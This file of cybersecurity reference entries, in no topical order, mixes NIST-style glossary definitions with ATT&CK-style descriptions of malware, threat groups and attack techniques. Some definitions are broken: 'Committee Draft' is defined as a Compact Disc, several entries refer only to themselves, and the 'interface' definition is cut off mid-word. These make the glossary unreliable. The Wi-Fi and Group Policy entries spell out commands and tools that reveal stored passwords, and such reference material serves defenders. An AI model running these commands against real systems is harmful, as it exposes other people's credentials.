Term: Log File Integrity Checking
Definition: Comparing the current message digest for a log file to the original message digest to determine if the log file has been modified.

Term: OOB
Definition: Communication between parties utilizing a means or method that differs from the current method of communication (e.g., one party uses U.S. Postal Service mail to communicate with another party where current communication is occurring online).

Term: <em>D</em>
Definition: The number of levels of trees in XMSSMT.

Term: authenticate
Definition: measures the number of times an attacker must authenticate to a target in order to exploit a vulnerability.

Term: Initialization Vector (IV)
Definition: A nonce that is associated with an invocation of authenticated encryption on a particular plaintext and AAD.

Term: Software as a Service (SaaS)
Definition: The capability provided to the consumer is to use the provider’s applications running on a cloud infrastructure. The applications are accessible from various client devices through either a thin client interface, such as a web browser (e.g., web-based email), or a program interface. The consumer does not manage or control the underlying cloud infrastructure including network, servers, operating systems, storage, or even individual application capabilities, with the possible exception of limited user-specific application configuration settings.

Term: message digest
Definition: See “message digest”.

Term: IT System
Definition: See information system.

Name: DropBook
Type: malware
Description: DropBook is a Python-based backdoor compiled with PyInstaller.

Term: cryptographic key
Definition: A parameter used in conjunction with a cryptographic algorithm that determines its operation in such a way that an entity with knowledge of the key can reproduce or reverse the operation, while an entity without knowledge of the key cannot. Examples include: The transformation of plaintext data inot cipertext data, the transformation of ciphertext into plaintext data, The computation of a digital signautre from data, The verification of a digital signautre, The computation of an authentication code from data, The computation of a shared secret that is used to derive keying material.

Term: information system boundary
Definition: All components of an information system to be authorized for operation by an authorizing official and excludes separately authorized systems, to which the information system is connected.

Term: domain
Definition: The term domain refers to a part of the network that is administered by a single authority.

Term: Block reward
Definition: A reward (typically cryptocurrency) awarded to publishing nodes for successfully adding a block to the blockchain.

Term: Certification Authority Workstation
Definition: Commercial-off-the-shelf (COTS) workstation with a trusted operating system and special purpose application software that is used to issue certificates. 
Rationale: Term has been replaced by the term “certificate authority workstation (CAW)”.

Term: technique
Definition: A set or class of technologies and processes intented to acheive one or more objectives by providing capabilities to anticipate, withstand, recover from, and adapt to adverse conditions, stresses, attacks, or compromises on systems that include cyber resources. The definition or statement of a technique describes the capabilities it provides and/or the intended consequences of using technologies to process it includes.

Term: Committee Draft
Definition: A Compact Disc(CD)is a class of media from which data are readby optical means.

Term: IRP
Definition: The documentation of a predetermined set of instructions or procedures to detect, respond to, and limit consequences of a malicious cyber attacks against an organization’s information systems(s).

Term: Checklist Developer
Definition: An individual or organization that develops and owns a checklist and submits it to the National Checklist Program.

Term: risk analysis
Definition: The process of identifying, estimating, and prioritizing risks to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation, resulting from the operation of an information system. Part of risk management incorporates threat and vulnerability analyses, and considers mitigations provided by security controls planned or in place.

Term: <strong>Should</strong>
Definition: The term used to indicate an important recommendation. Ignoring the recommendation could result in undesirable results. Note that <strong>should</strong> may be coupled with <strong>not</strong> to become <strong>should not</strong>.

Name: SUPERNOVA
Type: malware
Description: SUPERNOVA is an in-memory web shell written in .NET C#. It was discovered in November 2020 during the investigation of APT29's SolarWinds cyber operation but determined to be unrelated. Subsequent analysis suggests SUPERNOVA may have been used by the China-based threat group SPIRAL.

Name: Unknown Logger
Type: malware
Description: Unknown Logger is a publicly released, free backdoor. Version 1.5 of the backdoor has been used by the actors responsible for the MONSOON campaign.

Term: hash function
Definition: <p>A function that maps a bit string of arbitrary length to a fixed-length bit string. Approved hash functions satisfy the following properties:</p><p>i. (Collision resistance) It is computationally infeasible to find any two distinct inputs that map to the same output.</p><p>ii. (Preimage resistance) Given a randomly chosen target output, it is computationally infeasible to find any input that maps to that output. (This property is called the one-way property.)</p><p>iii. (Second preimage resistance) Given one input value, it is computationally infeasible to find a second (distinct) input value that maps to the same output as the first value.</p><p>This Recommendation uses the strength of the preimage resistance of a hash function as a contributing factor when determining the security strength provided by a key-derivation function.</p>

Term: 2FA
Definition: Authentication using two or more different factors to achieve authentication. Factors include: (i) something you know (e.g., password/PIN); (ii) something you have (e.g., cryptographic identification device, token); or (iii) something you are (e.g., biometric). See Authenticator.

Term: key establishment
Definition: A procedure that results in secret keying material that is shared among different parties.

Term: Route Origin Attestation
Definition: A Route Origin Attestation is a cryptographically verifiable attestation that a given Internet prefix can be announced by an AS listed within the attestation.

Term: Pharming
Definition: An attack in which an attacker causes the subscriber to be redirected to a fraudulent website, typically a fraudulent verifier/RP in the context of authentication. This could cause the subscriber to reveal sensitive information (e.g., a password) to the attacker, download harmful software, or contribute to a fraudulent act. This may be accomplished by corrupting an infrastructure service (e.g., the DNS) or the subscriber’s endpoint.

Term: Electronic Product Code Information Services (EPCIS)
Definition: An inter-enterprise subsystem that facilitates information sharing using the EPCglobal network. EPCISs provide information services necessary for the storage, communication and dissemination of EPC data in a secure environment.

Term: <i>K<sub>IN</sub></i>
Definition: A key-derivation key used as input to a key-derivation function (along with other data) to derive the output keying material <i>K<sub>OUT</sub></i>.

Name: BONDUPDATER
Type: malware
Description: BONDUPDATER is a PowerShell backdoor used by OilRig. It was first observed in November 2017 during targeting of a Middle Eastern government organization, and an updated version was observed in August 2018 being used to target a government organization with spearphishing emails.

Term: Cybersecurity Supply Chain Risk Management
Definition: A systematic process for managing exposure to cybersecurity risks throughout the supply chain and developing appropriate response strategies, policies, processes, and procedures.

Name: Botnet
Type: attack-pattern
Description: Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks. Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. 

Internet-facing edge devices and related network appliances that are end-of-life (EOL) and unsupported by their manufacturers are commonly acquired for botnet activities. Adversaries may lease operational relay box (ORB) networks – consisting of virtual private servers (VPS), small office/home office (SOHO) routers, or Internet of Things (IoT) devices – to serve as a botnet. 

With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale Phishing or Distributed Denial of Service (DDoS). Acquired botnets may also be used to support Command and Control activity, such as Hide Infrastructure through an established Proxy network.

Name: BRICKSTORM
Type: malware
Description: BRICKSTORM is a cross-platform backdoor with variants written in Go and Rust that facilitates command and control, the ingress transfer of other malware, and the exfiltration of data. BRICKSTORM has also been created from a .NET application using ahead-of-time (AOT) compilation to blend in within victim environments. BRICKSTORM was first observed in April 2024. BRICKSTORM has previously been leveraged by People's Republic of China (PRC) state-nexus actors identified as UNC6201, UNC5221, WARP PANDA, PunyToad, and SYLVANITE.

Term: bit
Definition: A binary digit: 0 or 1.

Term: Reference
Definition: See Informative Reference.

Term: RP
Definition: A person or Agency who has received information that includes a certificate and a digital signature verifiable with reference to a public key listed in the certificate, and is in a position to rely on them.

Name: Rubeus
Type: tool
Description: Rubeus is a C# toolset designed for raw Kerberos interaction that has been used since at least 2020, including in ransomware operations.

Term: Header
Definition: The section of an email message that contains vital information about the message, including origination date, sender, recipient(s), delivery path, subject, and format information. The header is generally left in clear text even when the body of the email message is encrypted.

Name: Silence
Type: intrusion-set
Description: Silence is a financially motivated threat actor targeting financial institutions in different countries. The group was first seen in June 2016. Their main targets reside in Russia, Ukraine, Belarus, Azerbaijan, Poland and Kazakhstan. They compromised various banking systems, including the Russian Central Bank's Automated Workstation Client, ATMs, and card processing.

Term: Security Authorization
Definition: Access privileges granted to an entity; conveys an “official” sanction to perform a cryptographic function or other sensitive activity.

Term: Mapping
Definition: Depiction of how data from one information source maps to data from another information source.

Name: Hidden File System
Type: attack-pattern
Description: Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.

Adversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions. Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system. Adversaries may also fragment files across the existing file system structure in non-standard ways.

Term: block
Definition: A binary vector. In this document, the input and output of encryption and decryption operation are 64-bit block. The bits are numbered from left to right. The plaintext and ciphertext are segmented to k-bit blocks, k = 1, 8, 64.

Term: parity bit
Definition: A checksum that is computed on a block of bits by computing the binary sum of the individual bits in the block and then discarding all but the low-order bit of the sum. See checksum.

Term: Security Fault Injection Test
Definition: Involves data perturbation (i.e., alteration of the type of data the execution environment components pass to the application, or that the application’s components pass to one another). Fault injection can reveal the effects of security defects on the behavior of the components themselves and on the application as a whole.

Term: privacy continuous monitoring program
Definition: An agency-wide program that implements the agency’s privacy continuous monitoring strategy and maintains ongoing awareness of threats and vulnerabilities that may pose privacy risks; monitors changes to information systems and environments of operation that create, collect, use, process, store, maintain, disseminate, disclose, or dispose of PII; and conducts privacy control assessments to verify the continued effectiveness of all privacy controls selected and implemented at an agency across the agency risk management tiers to ensure continued compliance with applicable privacy requirements and manage privacy risks.

Term: security specification
Definition: A document that specifies, in a complete, precise, verifiable manner, the requirements, design, behavior, or other characteristics of a system or component and often the procedures for determining whether these provisions have been satisfied. See specification requirement.

Term: Decryption
Definition: The process of changing ciphertext into plaintext using a cryptographic algorithm and key.

Term: International Mobile Subscriber Identity (IMSI)
Definition: A unique number associated with every GSM mobile phone subscriber, which is maintained on a (U)SIM.

Term: <em>p</em>
Definition: The number of n-byte string elements in an LM-OTS private key, public key, and signature.

Term: RSA
Definition: Algorithm developed by Rivest, Shamir and Adelman (allowed in FIPS 186-3 and specified in ANS X9.31 and PKCS #1).

Name: LookBack
Type: malware
Description: LookBack is a remote access trojan written in C++ that was used against at least three US utility companies in July 2019. The TALONITE activity group has been observed using LookBack.

Term: Virtualization
Definition: The simulation of the software and/or hardware upon which other software runs.

Name: AcidRain
Type: malware
Description: AcidRain is an ELF binary targeting modems and routers using MIPS architecture. AcidRain is associated with the ViaSat KA-SAT communication outage that took place during the initial phases of the 2022 full-scale invasion of Ukraine. Analysis indicates overlap with another network device-targeting malware, VPNFilter, associated with Sandworm Team. US and European government sources linked AcidRain to Russian government entities, while Ukrainian government sources linked AcidRain specifically to Sandworm Team.

Term: baseline configuration
Definition: A documented set of specifications for a system, or a configuration item within a system, that has been formally reviewed and agreed on at a given point in time, and which can be changed only through change control procedures.

Term: approval to operate
Definition: Authorization to Operate; One of three possible decisions concerning an issuer made by a Designated Authorizing Official after all assessment activities have been performed stating that the issuer is authorized to perform specific PIV Card and/or Derived Credential issuance services.

Term: Exculpatory Evidence
Definition: Evidence that tends to decrease the likelihood of fault or guilt.

Name: Group Policy Preferences
Type: attack-pattern
Description: Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.

These group policies are stored in SYSVOL on a domain controller. This means that any domain user can view the SYSVOL share and decrypt the password (using the AES key that has been made public).

The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:

* Metasploit’s post exploitation module: <code>post/windows/gather/credentials/gpp</code>
* Get-GPPPassword
* gpprefdecrypt.py

On the SYSVOL share, adversaries may use the following command to enumerate potential GPP XML files: <code>dir /s * .xml</code>

Term: Key-wrapping key
Definition: In this Recommendation, a key-wrapping key is a symmetric key established during a key-transport transaction and used with a key- wrapping algorithm to protect the keying material to be transported.

Term: Fingerprint
Definition: A hash value of a (public) key encoded into a string (e.g., into hexadecimal). Several fingerprint formats are in use by different SSH implementations.

Term: DPCI
Definition: Derived PIV Credential (and associated token) Issuer; an issuer of Derived PIV Credentials as defined in [NIST SP 800-63-2]and [NIST SP 800-157].

Term: chain of trust
Definition: See “authentication chain.”

Term: Key-transport transaction
Definition: An execution of a key-transport scheme.

Term: countermeasures
Definition: Actions, devices, procedures, techniques, or other measures that reduce the vulnerability of a system. Synonymous with security controls and safeguards.

Term: principal accrediting authority (PAA)
Definition: Senior official with authority and responsibility for all intelligence systems within an agency.

Term: attack surface
Definition: The set of points on the boundary of a system, a system element, or an environment where an attacker can try to enter, cause an effect on, or extract data from.

Term: trust anchor
Definition: 1. An authoritative entity for which trust is assumed. In a PKI, a trust anchor is a certification authority, which is represented by a certificate that is used to verify the signature on a certificate issued by that trust-anchor. The security of the validation process depends upon the authenticity and integrity of the trust anchor's certificate. Trust anchor certificates are often distributed as self-signed certificates.

Term: genomic information
Definition: Information based on an individual's genome, such as a sequence of DNA or the results of genetic testing.

Term: Oracle
Definition: A source of data from outside a blockchain that serves as input for a smart contract.

Name: RedEcho
Type: intrusion-set
Description: RedEcho is a People’s Republic of China-related threat actor associated with long-running intrusions in Indian critical infrastructure entities. RedEcho overlaps with various other PRC-linked threat groups, such as APT41, and is linked to ShadowPad malware use through shared infrastructure.

Name: IMAPLoader
Type: malware
Description: IMAPLoader is a .NET-based loader malware exclusively associated with CURIUM operations since at least 2022. IMAPLoader leverages email protocols for command and control and payload delivery.

Name: OSX_OCEANLOTUS.D
Type: malware
Description: OSX_OCEANLOTUS.D is a macOS backdoor used by APT32. First discovered in 2015, APT32 has continued to make improvements using a plugin architecture to extend capabilities, specifically using `.dylib` files. OSX_OCEANLOTUS.D can also determine it's permission level and execute according to access type (`root` or `user`).

Term: MAC Chaining Value
Definition: A 16-byte value that is an input to the CMAC function and used to detect communication errors in duplicate or missing commands.

Term: Host operating system
Definition: In a hosted virtualization solution, the OS that the hypervisor runs on top of.

Term: External Key
Definition: An authorized key that is used from outside the organization (or outside the  environment considered for SSH user key management purposes), or an identity key that is used for authenticating to outside the organization (or outside the environment considered for SSH user key management purposes). Key rotation can break external keys, and therefore it must be ensured that the other side of trust relationships involving external keys is also properly updated as part of rotation. Alternatively, rotation of external keys may be prevented, but that is not a sustainable solution long-term.

Term: MD
Definition: A hash that uniquely identifies data. Changing a single bit in the data stream used to generate the message digest will yield a completely different message digest.

Term: frequency
Definition: The rate of a repetitive event. If T is the period of a repetitive event, then the frequency f is its reciprocal, 1/T. Conversely, the period is the reciprocal of the frequency, T = 1 / f. Because the period is a time interval expressed in seconds (s), it is easy to see the close relationship between time interval and frequency. The standard unit for frequency is the hertz (Hz), defined as the number of events or cycles per second. The frequency of electrical signals is often measured in multiples of hertz, including kilohertz (kHz), megahertz (MHz), or gigahertz (GHz).

Term: Pseudorandom
Definition: A process or data produced by a process is said to be pseudorandom when the outcome is deterministic yet also effectively random as long as the internal action of the process is hidden from observation. For cryptographic purposes, “effectively random” means “computationally indistinguishable from random within the limits of the intended security strength.”

Term: Singulation
Definition: A function performed by a reader to individually identify any tags in the reader’s operating range.

Term: Hypertext Transfer Protocol (HTTP)
Definition: A standard method for communication between clients and Web servers.

Term: attack tree
Definition: A branching, hierarchical data structure that represents a set of potential approaches to achieving an event in which system security is penetrated or compromised in a specified way.

Term: communications security
Definition: A component of CS that deals with measures and controls taken to deny unauthorized persons information derived from telecommunications and to ensure the authenticity of such telecommunications. COMSEC includes cryptographic security, transmission security, emissions security, and physical security of COMSEC material and information.

Term: Container runtime
Definition: The environment for each container; comprised of binaries coordinating multiple operating system components that isolate resources and resource usage for running containers.

Term: focused testing
Definition: A test methodology that assumes some knowledge of the internal structure and implementation detail of the assessment object. Also known as focused testing.

Term: data integrity
Definition: A property whereby data has not been altered in an unauthorized manner since it was created, transmitted or stored.

Term: Associated Data
Definition: Input data to the CCM generation-encryption process that is authenticated but not encrypted.

Name: Masquerade Account Name
Type: attack-pattern
Description: Adversaries may match or approximate the names of legitimate accounts to make newly created ones appear benign. This will typically occur during Create Account, although accounts may also be renamed at a later date. This may also coincide with Account Access Removal if the actor first deletes an account before re-creating one with the same name.

Often, adversaries will attempt to masquerade as service accounts, such as those associated with legitimate software, data backups, or container cluster management. They may also give accounts generic, trustworthy names, such as “admin”, “help”, or “root.” Sometimes adversaries may model account names off of those already existing in the system, as a follow-on behavior to Account Discovery. 

Note that this is distinct from Impersonation, which describes impersonating specific trusted individuals or organizations, rather than user or service account names.

Name: Wi-Fi Discovery
Type: attack-pattern
Description: Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of Account Discovery, Remote System Discovery, and other discovery or Credential Access activity to support both ongoing and future campaigns.

Adversaries may collect various types of information about Wi-Fi networks from hosts. For example, on Windows names and passwords of all Wi-Fi networks a device has previously connected to may be available through `netsh wlan show profiles` to enumerate Wi-Fi names and then `netsh wlan show profile “Wi-Fi name” key=clear` to show a Wi-Fi network’s corresponding password. Additionally, names and other details of locally reachable Wi-Fi networks can be discovered using calls to `wlanAPI.dll` Native API functions.

On Linux, names and passwords of all Wi-Fi-networks a device has previously connected to may be available in files under ` /etc/NetworkManager/system-connections/`. On macOS, the password of a known Wi-Fi may be identified with ` security find-generic-password -wa wifiname` (requires admin username/password).

Name: SMS Pumping
Type: attack-pattern
Description: Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability. SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.

Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background. In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.

Term: Command and Control
Definition: Command and Control' is the exercise of authority and direction by a properly designated commander over assigned and attached forces in the accomplishment of the mission. Command and control functions are performed through an arrangement of personnel, equipment, communications, facilities, and procedures employed by a commander in planning, directing, coordinating, and controlling forces and operations in the accomplishment of the mission.

Term: data spillage
Definition: Security incident that results in the transfer of classified information or Controlled Unclassified Information onto an information system not authorized to store or process that information.

Term: network access
Definition: Access to an information system by a user (or a process acting on behalf of a user) communicating through a network (e.g., local area network, wide area network, Internet).

Term: public key cryptography (PKC)
Definition: Encryption system that uses a public-private key pair for encryption and/or digital signature.

Term: strength of function
Definition: Criterion expressing the minimum efforts assumed necessary to defeat the specified security behavior of an implemented security function by directly attacking its underlying security mechanisms.
Note 1: Strength of function has as a prerequisite that assumes that the underlying security mechanisms are correctly implemented. The concept of strength of functions may be equally applied to services or other capability-based abstraction provided by security mechanisms.
Note 2: The term robustness combines the concepts of assurance of correct implementation with strength of function to provide finer granularity in determining the trustworthiness of a system.

Term: CRL
Definition: A list of digital certificates that have been revoked by an issuing CA before their scheduled expiration date and should no longer be trusted.

Term: computer security object
Definition: A resource, tool, or mechanism used to maintain a condition of security in a computerized environment. These objects are defined in terms of attributes they possess, operations they perform or are performed on them, and their relationship with other objects.

Term: Certificate owner
Definition: A human entity that is identified as the subject in a public key certificate or is a sponsor of a non-human entity (e.g., device, application or process) that is identified as the certificate subject.

Name: Unix Shell Configuration Modification
Type: attack-pattern
Description: Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shells execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (<code>/etc</code>) and the user’s home directory (<code>~/</code>) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. 

Adversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the <code>/etc/profile</code> and <code>/etc/profile.d</code> files. These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into <code>~/.bash_profile</code>, <code>~/.bash_login</code>, or <code>~/.profile</code> which are sourced when a user opens a command-line interface or connects remotely. Since the system only executes the first existing file in the listed order, adversaries have used <code>~/.bash_profile</code> to ensure execution. Adversaries have also leveraged the <code>~/.bashrc</code> file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface. Some malware targets the termination of a program to trigger execution, adversaries can use the <code>~/.bash_logout</code> file to execute malicious commands at the end of a session. 

For macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using <code>/etc/profile</code>, <code>/etc/zshenv</code>, <code>/etc/zprofile</code>, and <code>/etc/zlogin</code>. The login shell then configures the user environment with <code>~/.zprofile</code> and <code>~/.zlogin</code>. The interactive shell uses the <code>~/.zshrc</code> to configure the user environment. Upon exiting, <code>/etc/zlogout</code> and <code>~/.zlogout</code> are executed. For legacy programs, macOS executes <code>/etc/bashrc</code> on startup.

Term: privacy control
Definition: The administrative, technical, and physical safeguards employed within an organization to satisfy privacy requirements.

Term: attack surface
Definition: The set of points on the boundary of a system, a system element, or an environment where an attacker can try to enter, cause an effect on, or extract data from, that system, system element, or environment.

Term: Root Certificate
Definition: A self-signed certificate, as defined by IETF RFC 5280, issued by a root CA. A root certificate is typically securely installed on systems so they can verify end-entity certificates they receive.

Term: behavior
Definition: The way that an entity functions as an action, reaction, or interaction.

Term: CMaaS
Definition: See Continuous Monitoring as a Service

Term: INFOSEC
Definition: synonymous withIT Security.

Term: interface
Definition: A boundary between the IoT device and entities where interactio

Term: Event Aggregation
Definition: See “Event Aggregation”.

Term: individuals
Definition: An assessment object that includes people applying specifications, mechanisms, or activities.

Term: Internal Security Testing
Definition: Security testing conducted from inside the organization’s security perimeter.

Term: External Security Testing
Definition: Security testing conducted from outside the organization’s security perimeter.

Name: Pandora
Type: malware
Description: Pandora is a multistage kernel rootkit with backdoor functionality that has been in use by Threat Group-3390 since at least 2020.

Term: Key length
Definition: Used interchangeably with “Key size”.

Name: Multi-hop Proxy
Type: attack-pattern
Description: Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.

For example, adversaries may construct or use onion routing networks – such as the publicly available Tor network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network. Adversaries may also use operational relay box (ORB) networks composed of virtual private servers (VPS), Internet of Things (IoT) devices, smart devices, and end-of-life routers to obfuscate their operations. 

In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., Network Devices). By leveraging Patch System Image on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the Network Boundary Bridging method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport. 

Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.

Term: <em>t</em>
Definition: The bit length of the authentication tag.

Term: Asset Report
Definition: A collection of content (or link to content) about an asset.

Term: COTS
Definition: Hardware and software IT products that are ready-made and available for purchase by the general public.

Name: FrostyGoop Incident
Type: campaign
Description: FrostyGoop Incident took place in January 2024 against a municipal district heating company in Ukraine. Following initial access via likely exploitation of external facing services, FrostyGoop was used to manipulate ENCO control systems via legitimate Modbus commands to impact the delivery of heating services to Ukrainian civilians.

Term: <em>Binary data (from a noise source)</em>
Definition: Digitized output from a noise source that consists of a single bit; that is, each sampled output value is represented as either 0 or 1.

Term: software product and executable file version
Definition: A patch level versioning of the software product or digital fingerprint version of a software file.

Term: access control
Definition: The right or a permission that is granted to a system entity to access a system resource.

Term: non-repudiation
Definition: A service using a digital signature that is used to support a determination of whether a message was actually signed by a given entity.

Term: security incident
Definition: An occurrence that actually or potentially jeopardizes the confidentiality, integrity, or availability of an information system or the information the system processes, stores, or transmits or that constitutes a violation or imminent threat of violation of security policies, security procedures, or acceptable use policies

Term: <em>a mod b</em>
Definition: The modulo operation of integers a and b. “a mod b” returns the remainder after dividing a by b.

Term: degauss
Definition: To reduce the magnetic flux to virtual zero by applying a reverse magnetizing field that is matched to the ISM coercivity.

Term: redaction
Definition: The removal of information from a document or dataset for legal or security purposes.

Term: system component
Definition: A discrete identifiable information or operational technology asset that represents a building block of a system and may include hardware, software, and firmware.

Name: GlassWorm
Type: malware
Description: GlassWorm is a worm that propagated through supply chain attacks by compromising repository credentials from victim environments and having malicious payloads added to those compromised accounts for distribution to victims across the various development ecosystems. GlassWorm has numerous variants, including Rust binaries, encrypted JavaScript and a variant leveraging invisible Unicode characters that made reverse engineering difficult. GlassWorm has employed a unique command and control (C2) methodology using Solana blockchain. GlassWorm was first reported in October 2025.

Term: ISSO
Definition: Individual with assigned responsibility for maintaining the appropriate operational security posture for an information system or program.

Term: applicant
Definition: An individual applying for a PIV Card/credential. The Applicant may be a current or prospective Federal hire, a Federal employee, or a contractor.

Term: public key certificate
Definition: See public key certificate.

Term: judgment
Definition: The association of one of the preconfigured evaluation choices with an element from the context of a specific organizational level.

Term: Biometrics
Definition: Automated recognition of individuals based on their biological or behavioral characteristics. Biological characteristics include but are not limited to fingerprints, palm prints, facial features, iris and retina patterns, voice prints, and vein patterns. Behavioral characteristics include keystroke cadence, the angle of holding a smartphone, screen pressure, typing speed, mouse or mobile phone movements, and gyroscope position, among others.

Name: Backup Software Discovery
Type: attack-pattern
Description: Adversaries may attempt to get a listing of backup software or configurations that are installed on a system. Adversaries may use this information to shape follow-on behaviors, such as Data Destruction, Inhibit System Recovery, or Data Encrypted for Impact. 

Commands that can be used to obtain security software information are netsh, `reg query` with Reg, `dir` with cmd, and Tasklist, but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for, such as Veeam, Acronis, Dropbox, or Paragon.

Term: key-establishment key pair
Definition: A private/public key pair used in a key-establishment scheme.

Term: key transport
Definition: <p>A key-establishment procedure whereby one party (the sender) selects and encrypts (or wraps) the keying material and then distributes it to another party (the receiver).</p><p>When used in conjunction with a public- key (asymmetric) algorithm, the key is encrypted using the public key of the receiver and subsequently decrypted using receiver's private key.</p><p>When used in conjunction with a symmetric algorithm, the key is encrypted with a key- wrapping key shared by the sending and receiving parties and decrypted using the same key.</p>

Term: KDK
Definition: A key used as an input to a key-derivation function to derive additional keying material.

Term: adaptability
Definition: The property of an architecture, design, and implementation that can accommodate changes to the threat model, mission or business functions, systems, and technologies without major programmatic impacts.

Name: REvil
Type: malware
Description: REvil is a ransomware family that has been linked to the GOLD SOUTHFIELD group and operated as ransomware-as-a-service (RaaS) since at least April 2019. REvil, which as been used against organizations in the manufacturing, transportation, and electric sectors, is highly configurable and shares code similarities with the GandCrab RaaS.

Term: <em>P#j</em>
Definition: The jth plaintext segment.

Term: cyber incident
Definition: An occurrence that actually or imminently jeopardizes, without lawful authority, the integrity, confidentiality, or availability of information or an information system; or constitutes a violation or imminent threat of violation of law, security policies, security procedures, or acceptable use policies.

Term: systems security engineering
Definition: A transdisciplinary and integrative approach to enable the successful secure realization, use, and retirement of engineered systems using systems, security, and other principles and concepts, as well as scientific, technological, and management methods. Systems security engineering is a subdiscipline of systems engineering.

Term: hash function
Definition: A function on arbitrarily long bit strings in which the length of the output is fixed. At a minimum, the hash function must be one-way and collision-resistant.

Term: ACL
Definition: A mechanism that implements access control for a system resource by enumerating the identities of the system entities that are permitted to access the resources.

Term: TE
Definition: An event or situation that has the potential for causing undesirable consequences or impact.

Term: availability
Definition: the timely, reliable access to data and information services for authorized users.

Term: information technology product
Definition: A discrete identifiable IT asset that represents a building block of an information system.

Term: factor
Definition: The three types of authentication factors are something you know, something you have, and something you are. Every authenticator has one or more authentication factors.

Term: security relevance
Definition: The term used to describe those functions or mechanisms that are relied upon, directly or indirectly, to enforce a security policy that governs confidentiality, integrity, and availability protections.

Term: mechanism
Definition: An operating system entry point or separate operating system support program that performs a specific action or related group of actions.

Term: customer
Definition: The term customer applies to a person or organization who subscribes to a service offered by a telecommunications provider and is accountable for its use. A customer is permitted to use an NE to make calls and configure local line parameters (e.g., configure the numbers that should receive forwarded calls).
In some circumstances a customer can also play the role of administrator, for example, when the customer has access to operations information that would permit him to reconfigure his circuits. Some service providers offer this service, as well as other OAM&P features, to customers for a fee.

Term: Defect Type
Definition: A kind of defect that could occur on many assessment objects. Generally, a defect check tests for the presence or absence of a defect type.

Name: Phishing
Type: attack-pattern
Description: Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.

Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., Email Hiding Rules). Another way to accomplish this is by Email Spoofing the identity of the sender, which can be used to fool both the human recipient as well as automated security tools, or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").

Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware, or install adversary-accessible remote management tools onto their computer (i.e., User Execution).

Term: negative risk
Definition: Any circumstance or event with the potential to adversely impact organizational operations, organizational assets, individuals, other organizations, or the Nation through a system via unauthorized access, destruction, disclosure, modification of information, or denial of service.

Name: Restrict Registry Permissions
Type: course-of-action
Description: Restricting registry permissions involves configuring access control settings for sensitive registry keys and hives to ensure that only authorized users or processes can make modifications. By limiting access, organizations can prevent unauthorized changes that adversaries might use for persistence, privilege escalation, or defense evasion. This mitigation can be implemented through the following measures:

Review and Adjust Permissions on Critical Keys

- Regularly review permissions on keys such as `Run`, `RunOnce`, and `Services` to ensure only authorized users have write access.
- Use tools like `icacls` or `PowerShell` to automate permission adjustments.

Enable Registry Auditing

- Enable auditing on sensitive keys to log access attempts.
